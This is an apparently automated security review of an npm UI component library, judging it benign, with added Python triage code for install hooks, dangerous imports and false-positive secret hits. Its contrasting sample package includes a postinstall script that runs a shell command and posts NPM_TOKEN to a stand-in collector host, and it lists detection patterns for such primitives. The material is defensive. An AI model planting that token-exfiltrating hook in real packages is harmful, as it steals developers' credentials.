AI Security Review
scanned 3d ago · by lpm-firewall-ai
No confirmed malicious attack surface was found. The package is a React/React Native UI component library whose networking is user-invoked and whose local persistence matches its documented components.
Static reason
One or more suspicious static signals were detected.
Trigger
Importing exported UI modules or rendering specific components/hooks.
Impact
No evidence of unconsented execution, credential harvesting, persistence, destructive behavior, or exfiltration.
Mechanism
UI rendering, optional feedback POST, public config detection, and local UI cache/theme storage.
Rationale
Static inspection found suspicious primitives only in package-aligned UI features and no install-time/import-time malware behavior. The source facts support a clean verdict despite scanner hits for network, env vars, and secret-like demo/public auth strings.
Evidence
- package.json
- dist/web/index.js
- dist/native/index.js
- dist/index.js
- dist/motion-presets/motion-presets.js
- README.md
Decision evidence
public snapshot · AI called this Clean (Benign) at 93.0% confidence with low false-positive risk.
Evidence for block
- dist/web/index.js has a user-invoked feedback form that POSTs to a caller-supplied endpoint.
- dist/web/index.js and dist/native/index.js read NEXT_PUBLIC_* env values for auth configuration.
- dist/web/index.js and dist/native/index.js use localStorage for theme/offline cache persistence.
Evidence against
- package.json defines no install/preinstall/postinstall lifecycle scripts or bin entrypoints.
- Exports point to React UI bundles: dist/web/index.js, dist/native/index.js, and motion presets.
- No child_process, fs/os/path imports, eval/new Function, native binaries, shell scripts, or dropped files found.
- Network code is component/hook driven: feedback endpoint is passed by the consumer; NetInfo checks connectivity only.
- Env reads only detect public client auth config (NEXT_PUBLIC_* values) and fall back to a demo value; they are not credential harvesting or exfiltration.
- External URLs are UI/documentation/assets such as GitHub metadata, social share links, Google Fonts, Unsplash avatars, and demo Supabase.
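The checks in the list above, as an added example that is not the scanner's or the package's own code: a small Python triage that parses package.json for lifecycle hooks and bin entries, greps the shipped bundles for the primitives a UI library has no reason to import, and separates NEXT_PUBLIC_* env reads from private ones. The package.json documents, bundle snippets, file names and domains are constructed (one benign UI bundle mirroring this page's evidence, one contrasting suspect package), and the clean/review rule is an assumption.

```python
"""Install-time and import-time triage of an npm package, mirroring the
'Evidence against' checks. Added example; all sample inputs are constructed."""
import json
import re

# npm runs these without the consumer calling anything: an install-time execution path.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "uninstall", "postuninstall")


def _import_rx(module: str) -> "re.Pattern":
    """require()/import() of `module` or an ESM `from "module"` clause; node: prefix optional."""
    m = re.escape(module)
    return re.compile(r"""(?:require|import)\s*\(\s*["'](?:node:)?%s["']|from\s*["'](?:node:)?%s["']""" % (m, m))


# Primitives a React UI bundle has no reason to touch.
DANGEROUS_PRIMITIVES = {
    "child_process": _import_rx("child_process"),
    "fs": re.compile(r"""(?:require|import)\s*\(\s*["'](?:node:)?fs(?:/promises)?["']"""
                     r"""|from\s*["'](?:node:)?fs(?:/promises)?["']"""),
    "os": _import_rx("os"),
    "path": _import_rx("path"),
    "eval": re.compile(r"\beval\s*\("),
    "new Function": re.compile(r"\bnew\s+Function\s*\("),
}
ENV_READ = re.compile(r"""process\.env(?:\.([A-Za-z0-9_]+)|\[["']([A-Za-z0-9_]+)["']\])""")
URL_LITERAL = re.compile(r"""https?://[^\s"'`)]+""")
BENIGN_ENV = {"NODE_ENV"}  # bundlers inline this; it is not a secret


def triage_package(package_json: str, bundles: dict) -> dict:
    """Return the static signals plus a clean/review verdict (the verdict rule is an assumption)."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    hooks = sorted(h for h in scripts if h in LIFECYCLE_HOOKS)
    bin_field = pkg.get("bin") or {}
    if isinstance(bin_field, str):  # "bin": "./cli.js" shorthand
        bin_field = {pkg.get("name", ""): bin_field}
    primitives, env_reads, urls = {}, set(), set()
    for path, src in bundles.items():
        hits = [name for name, rx in DANGEROUS_PRIMITIVES.items() if rx.search(src)]
        if hits:
            primitives[path] = hits
        for dotted, bracketed in ENV_READ.findall(src):
            env_reads.add(dotted or bracketed)
        urls.update(URL_LITERAL.findall(src))
    public_env = sorted(v for v in env_reads if v.startswith("NEXT_PUBLIC_"))
    private_env = sorted(env_reads - set(public_env) - BENIGN_ENV)
    return {
        "lifecycle_hooks": hooks,
        "bin_entries": sorted(bin_field),
        "dangerous_primitives": primitives,
        "public_env_reads": public_env,
        "private_env_reads": private_env,
        "urls": sorted(urls),
        # Clean only if nothing runs at install time and the bundles neither spawn
        # processes, touch the filesystem, eval, nor read non-public env values.
        "clean": not (hooks or primitives or private_env),
    }


# Constructed benign package: build/test scripts only, UI bundles, public env read with demo fallback.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-ui-kit", "version": "1.0.0",
    "scripts": {"build": "tsup", "test": "vitest run"},
    "exports": {".": "./dist/index.js", "./web": "./dist/web/index.js", "./native": "./dist/native/index.js"},
})
BENIGN_BUNDLES = {
    "dist/web/index.js": (
        'const AUTH_URL=process.env.NEXT_PUBLIC_SUPABASE_URL||"https://demo.example.test";'
        'async function sendFeedback(e,b){return fetch(e,{method:"POST",body:JSON.stringify(b)})}'
        'const theme=localStorage.getItem("ui-theme");'
    ),
    "dist/native/index.js": 'import NetInfo from "@react-native-community/netinfo";',
}

# Constructed contrasting package: a postinstall hook that spawns a process and reads a private token.
SUSPECT_PACKAGE_JSON = json.dumps({
    "name": "example-ui-kit", "version": "1.0.1",
    "scripts": {"build": "tsup", "postinstall": "node setup.js"},
    "bin": {"ui-kit": "./cli.js"},
})
SUSPECT_BUNDLES = {
    "setup.js": (
        'const {execSync}=require("child_process");'
        'const token=process.env.NPM_TOKEN;'
        'execSync("uname -a");'
        'fetch("https://collector.invalid/c",{method:"POST",body:token});'
    ),
}

if __name__ == "__main__":
    print(json.dumps(triage_package(BENIGN_PACKAGE_JSON, BENIGN_BUNDLES), indent=2))
    print(json.dumps(triage_package(SUSPECT_PACKAGE_JSON, SUSPECT_BUNDLES), indent=2))
```

The point of running both samples is that the same primitives that look harmless in a component (a fetch, a localStorage read) become decisive once a lifecycle hook or a child_process import is present: the verdict is driven by the execution path, not by the presence of network code alone.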
Behavioral surface
Environment Vars · Network · High Entropy Strings · Url Strings
Source & flagged code
10 flagged

dist/native/index.js
- line 8613 · patternName = generic_password · severity = medium · matchedText = newError...ed";
- line 8615 · patternName = generic_password · severity = medium · matchedText = newError...rs";
- line 8822 · patternName = generic_password · severity = medium · matchedText = newError...ed";
- line 8824 · patternName = generic_password · severity = medium · matchedText = newError...rs";
- line 8826 · patternName = generic_password · severity = medium · matchedText = newError...er";

dist/native/index.mjs
- line 8636 · patternName = generic_password · severity = medium · matchedText = newError...ed";
- line 8638 · patternName = generic_password · severity = medium · matchedText = newError...rs";
- line 8853 · patternName = generic_password · severity = medium · matchedText = newError...ed";
- line 8855 · patternName = generic_password · severity = medium · matchedText = newError...rs";
- line 8857 · patternName = generic_password · severity = medium · matchedText = newError...er";
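Every flagged matchedText above begins with `new Error`, which is why the Rationale treats the generic_password hits as scanner noise: the pattern fired on thrown error-message strings, not on credentials. The triage below is an added example, not the scanner's rule or the package's code: a deliberately loose keyword-then-quoted-string regex stands in for the scanner (an assumption), and each hit is classified by the context in front of the opening quote (a `new Error(`/`throw` call, a `process.env.NEXT_PUBLIC_*` fallback, or a plain assignment). The sample lines are constructed to resemble minified bundle statements.

```python
"""Triage of generic_password hits in a bundle. Added example: the scanner
regex, the context rules and the sample lines are all constructed."""
import math
import re
from collections import Counter

# A loose 'generic password' pattern of the kind that produces hits like those above:
# a keyword, then a quoted string within 40 characters (assumption, not the scanner's real rule).
KEYWORD_THEN_STRING = re.compile(
    r"""(?i)(?:password|passwd|pwd|secret|token|api_?key|_key)[^"'`\n]{0,40}?(["'`])(?P<value>[^"'`\n]{6,120})\1""")

# Context rules, each tested against the text that precedes the opening quote.
USER_FACING = re.compile(r"(?:new\s+Error|throw|console\.\w+|\.message\s*=|alert)\s*\(?\s*$")
PUBLIC_FALLBACK = re.compile(r"process\.env\.NEXT_PUBLIC_\w+\s*(?:\|\||\?\?)\s*$")
ASSIGNMENT = re.compile(r"(?i)(?:password|passwd|pwd|secret|token|api_?key|_key)\w*\s*[:=]\s*$")


def shannon_entropy(s: str) -> float:
    """Bits per character; a real credential is usually above ~3.0, prose is lower."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def classify(line: str, m: "re.Match") -> str:
    before = line[: m.start("value") - 1]  # everything up to the opening quote
    if USER_FACING.search(before):
        return "user_facing_message"      # thrown or logged text, not a secret
    if PUBLIC_FALLBACK.search(before):
        return "public_config_fallback"   # demo value behind a NEXT_PUBLIC_* read
    if ASSIGNMENT.search(before):
        return "hardcoded_secret"         # literal assigned to a credential-named field
    return "prose" if " " in m.group("value") else "unclassified"


def triage_secret_hits(lines) -> list:
    """Run the loose scanner over each line and label every hit with its context class."""
    hits = []
    for no, line in enumerate(lines, 1):
        for m in KEYWORD_THEN_STRING.finditer(line):
            value = m.group("value")
            hits.append({"line": no, "value": value,
                         "entropy": shannon_entropy(value), "label": classify(line, m)})
    return hits


# Constructed lines in minified-bundle style; lines 1-2 mimic the kind of hit shown above.
SAMPLE_LINES = [
    'if(!r.password)throw new Error("Password is required");',
    'if(r.password.length<8)throw new Error("Use at least 8 characters");',
    'const n=process.env.NEXT_PUBLIC_SUPABASE_KEY||"public-anon-demo-key-123456";',
    'const smtp={host:"mail.example.test",password:"S3cr3t-Pa55w0rd!"};',
    'const label="Forgot password?";',  # keyword inside a short string: no quoted value follows, no hit
]

if __name__ == "__main__":
    for h in triage_secret_hits(SAMPLE_LINES):
        print(f'line {h["line"]}: {h["label"]:<24} entropy={h["entropy"]:.2f} value={h["value"]!r}')
```

Only the fourth line deserves a medium finding; the first two are exactly the class of hit listed above and should be downgraded before a verdict is formed, which is the reasoning the Rationale section applies to this package.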
Findings
12 Medium · 3 Low
- Medium · Secret Pattern · dist/native/index.js
- Medium · Network
- Medium · Environment Vars
- Medium · Secret Pattern · dist/native/index.js
- Medium · Secret Pattern · dist/native/index.js
- Medium · Secret Pattern · dist/native/index.js
- Medium · Secret Pattern · dist/native/index.js
- Medium · Secret Pattern · dist/native/index.mjs
- Medium · Secret Pattern · dist/native/index.mjs
- Medium · Secret Pattern · dist/native/index.mjs
- Medium · Secret Pattern · dist/native/index.mjs
- Medium · Secret Pattern · dist/native/index.mjs
- Low · Scripts Present
- Low · High Entropy Strings
- Low · Url Strings